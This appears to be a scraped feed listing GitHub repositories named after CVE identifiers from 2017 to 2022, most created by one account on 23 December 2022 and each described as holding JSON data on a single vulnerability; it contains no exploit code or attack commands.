**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-26730 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-26730](https://github.com/Live-Hack-CVE/CVE-2021-26730) create time: 2022-12-23T09:52:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-26728 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-26728](https://github.com/Live-Hack-CVE/CVE-2021-26728) create time: 2022-12-23T09:51:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23518 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23518](https://github.com/Live-Hack-CVE/CVE-2021-23518) create time: 2022-12-23T09:50:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-34055 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-34055](https://github.com/Live-Hack-CVE/CVE-2021-34055) create time: 2022-12-23T09:49:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-33890 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-33890](https://github.com/Live-Hack-CVE/CVE-2022-33890) create time: 2022-12-23T10:19:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41741 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41741](https://github.com/Live-Hack-CVE/CVE-2022-41741) create time: 2022-12-23T10:19:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-31043 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-31043](https://github.com/Live-Hack-CVE/CVE-2022-31043) create time: 2022-12-23T10:19:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-31091 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-31091](https://github.com/Live-Hack-CVE/CVE-2022-31091) create time: 2022-12-23T10:19:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-31042 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-31042](https://github.com/Live-Hack-CVE/CVE-2022-31042) create time: 2022-12-23T10:19:26Z

**no description** : [Nidhi77777/linux-4.19.72_CVE-2022-29581](https://github.com/Nidhi77777/linux-4.19.72_CVE-2022-29581) create time: 2022-12-23T10:19:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29248 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29248](https://github.com/Live-Hack-CVE/CVE-2022-29248) create time: 2022-12-23T10:19:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39222 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39222](https://github.com/Live-Hack-CVE/CVE-2022-39222) create time: 2022-12-23T10:19:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3373 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3373](https://github.com/Live-Hack-CVE/CVE-2022-3373) create time: 2022-12-23T10:18:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3370 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3370](https://github.com/Live-Hack-CVE/CVE-2022-3370) create time: 2022-12-23T10:18:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43750 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43750](https://github.com/Live-Hack-CVE/CVE-2022-43750) create time: 2022-12-23T10:18:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3635 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3635](https://github.com/Live-Hack-CVE/CVE-2022-3635) create time: 2022-12-23T10:18:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2840 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2840](https://github.com/Live-Hack-CVE/CVE-2022-2840) create time: 2022-12-23T10:18:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3633 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3633](https://github.com/Live-Hack-CVE/CVE-2022-3633) create time: 2022-12-23T10:18:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20422 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20422](https://github.com/Live-Hack-CVE/CVE-2022-20422) create time: 2022-12-23T10:18:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20421 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20421](https://github.com/Live-Hack-CVE/CVE-2022-20421) create time: 2022-12-23T10:18:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21797 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21797](https://github.com/Live-Hack-CVE/CVE-2022-21797) create time: 2022-12-23T10:18:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1679 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1679](https://github.com/Live-Hack-CVE/CVE-2022-1679) create time: 2022-12-23T10:07:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3649 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3649](https://github.com/Live-Hack-CVE/CVE-2022-3649) create time: 2022-12-23T10:07:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-0171 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-0171](https://github.com/Live-Hack-CVE/CVE-2022-0171) create time: 2022-12-23T10:07:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3303 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3303](https://github.com/Live-Hack-CVE/CVE-2022-3303) create time: 2022-12-23T10:07:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25892 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25892](https://github.com/Live-Hack-CVE/CVE-2022-25892) create time: 2022-12-23T10:07:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35020 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35020](https://github.com/Live-Hack-CVE/CVE-2022-35020) create time: 2022-12-23T10:07:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35017 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35017](https://github.com/Live-Hack-CVE/CVE-2022-35017) create time: 2022-12-23T10:06:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35016 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35016](https://github.com/Live-Hack-CVE/CVE-2022-35016) create time: 2022-12-23T10:06:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35014 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35014](https://github.com/Live-Hack-CVE/CVE-2022-35014) create time: 2022-12-23T10:06:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35018 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35018](https://github.com/Live-Hack-CVE/CVE-2022-35018) create time: 2022-12-23T10:06:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35019 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35019](https://github.com/Live-Hack-CVE/CVE-2022-35019) create time: 2022-12-23T10:06:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35015 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35015](https://github.com/Live-Hack-CVE/CVE-2022-35015) create time: 2022-12-23T10:06:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3551 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3551](https://github.com/Live-Hack-CVE/CVE-2022-3551) create time: 2022-12-23T10:06:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-6891 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-6891](https://github.com/Live-Hack-CVE/CVE-2017-6891) create time: 2022-12-23T09:14:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45640 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45640](https://github.com/Live-Hack-CVE/CVE-2022-45640) create time: 2022-12-23T09:17:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45215 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45215](https://github.com/Live-Hack-CVE/CVE-2022-45215) create time: 2022-12-23T09:17:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3696 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3696](https://github.com/Live-Hack-CVE/CVE-2022-3696) create time: 2022-12-23T09:17:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3713 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3713](https://github.com/Live-Hack-CVE/CVE-2022-3713) create time: 2022-12-23T09:17:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45562 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45562](https://github.com/Live-Hack-CVE/CVE-2022-45562) create time: 2022-12-23T09:17:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4270 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4270](https://github.com/Live-Hack-CVE/CVE-2022-4270) create time: 2022-12-23T09:16:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2808 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2808](https://github.com/Live-Hack-CVE/CVE-2022-2808) create time: 2022-12-23T09:16:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41969 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41969](https://github.com/Live-Hack-CVE/CVE-2022-41969) create time: 2022-12-23T09:16:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2807 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2807](https://github.com/Live-Hack-CVE/CVE-2022-2807) create time: 2022-12-23T09:16:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44930 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44930](https://github.com/Live-Hack-CVE/CVE-2022-44930) create time: 2022-12-23T09:16:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41968 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41968](https://github.com/Live-Hack-CVE/CVE-2022-41968) create time: 2022-12-23T09:16:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44928 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44928](https://github.com/Live-Hack-CVE/CVE-2022-44928) create time: 2022-12-23T09:16:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44929 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44929](https://github.com/Live-Hack-CVE/CVE-2022-44929) create time: 2022-12-23T09:16:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43325 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43325](https://github.com/Live-Hack-CVE/CVE-2022-43325) create time: 2022-12-23T09:16:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41043 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41043](https://github.com/Live-Hack-CVE/CVE-2022-41043) create time: 2022-12-23T09:16:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38045 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38045](https://github.com/Live-Hack-CVE/CVE-2022-38045) create time: 2022-12-23T09:16:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45869 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45869](https://github.com/Live-Hack-CVE/CVE-2022-45869) create time: 2022-12-23T09:16:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45645 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45645](https://github.com/Live-Hack-CVE/CVE-2022-45645) create time: 2022-12-23T09:15:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45644 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45644](https://github.com/Live-Hack-CVE/CVE-2022-45644) create time: 2022-12-23T09:15:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44947 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44947](https://github.com/Live-Hack-CVE/CVE-2022-44947) create time: 2022-12-23T09:15:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44946 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44946](https://github.com/Live-Hack-CVE/CVE-2022-44946) create time: 2022-12-23T09:15:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44944 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44944](https://github.com/Live-Hack-CVE/CVE-2022-44944) create time: 2022-12-23T09:15:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4213 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4213](https://github.com/Live-Hack-CVE/CVE-2022-4213) create time: 2022-12-23T09:15:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4212 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4212](https://github.com/Live-Hack-CVE/CVE-2022-4212) create time: 2022-12-23T09:15:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4211 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4211](https://github.com/Live-Hack-CVE/CVE-2022-4211) create time: 2022-12-23T09:15:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4210 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4210](https://github.com/Live-Hack-CVE/CVE-2022-4210) create time: 2022-12-23T09:15:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4208 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4208](https://github.com/Live-Hack-CVE/CVE-2022-4208) create time: 2022-12-23T09:15:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4209 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4209](https://github.com/Live-Hack-CVE/CVE-2022-4209) create time: 2022-12-23T09:15:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4220 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4220](https://github.com/Live-Hack-CVE/CVE-2022-4220) create time: 2022-12-23T09:15:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4219 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4219](https://github.com/Live-Hack-CVE/CVE-2022-4219) create time: 2022-12-23T09:14:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28636 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28636](https://github.com/Live-Hack-CVE/CVE-2020-28636) create time: 2022-12-23T07:56:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28601 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28601](https://github.com/Live-Hack-CVE/CVE-2020-28601) create time: 2022-12-23T07:55:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35628 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35628](https://github.com/Live-Hack-CVE/CVE-2020-35628) create time: 2022-12-23T07:55:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35636 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35636](https://github.com/Live-Hack-CVE/CVE-2020-35636) create time: 2022-12-23T07:55:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35635 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35635](https://github.com/Live-Hack-CVE/CVE-2020-35635) create time: 2022-12-23T07:55:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35634 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35634](https://github.com/Live-Hack-CVE/CVE-2020-35634) create time: 2022-12-23T07:55:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35633 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35633](https://github.com/Live-Hack-CVE/CVE-2020-35633) create time: 2022-12-23T07:55:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28626 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28626](https://github.com/Live-Hack-CVE/CVE-2020-28626) create time: 2022-12-23T07:55:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28623 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28623](https://github.com/Live-Hack-CVE/CVE-2020-28623) create time: 2022-12-23T07:55:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28622 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28622](https://github.com/Live-Hack-CVE/CVE-2020-28622) create time: 2022-12-23T07:55:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28621 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28621](https://github.com/Live-Hack-CVE/CVE-2020-28621) create time: 2022-12-23T07:55:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28620 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28620](https://github.com/Live-Hack-CVE/CVE-2020-28620) create time: 2022-12-23T07:55:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28619 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28619](https://github.com/Live-Hack-CVE/CVE-2020-28619) create time: 2022-12-23T07:55:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28618 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28618](https://github.com/Live-Hack-CVE/CVE-2020-28618) create time: 2022-12-23T07:55:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28617 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28617](https://github.com/Live-Hack-CVE/CVE-2020-28617) create time: 2022-12-23T07:55:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28616 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28616](https://github.com/Live-Hack-CVE/CVE-2020-28616) create time: 2022-12-23T07:54:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28615 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28615](https://github.com/Live-Hack-CVE/CVE-2020-28615) create time: 2022-12-23T07:54:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28614 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28614](https://github.com/Live-Hack-CVE/CVE-2020-28614) create time: 2022-12-23T07:54:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28613 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28613](https://github.com/Live-Hack-CVE/CVE-2020-28613) create time: 2022-12-23T07:54:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28612 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28612](https://github.com/Live-Hack-CVE/CVE-2020-28612) create time: 2022-12-23T07:54:37Z

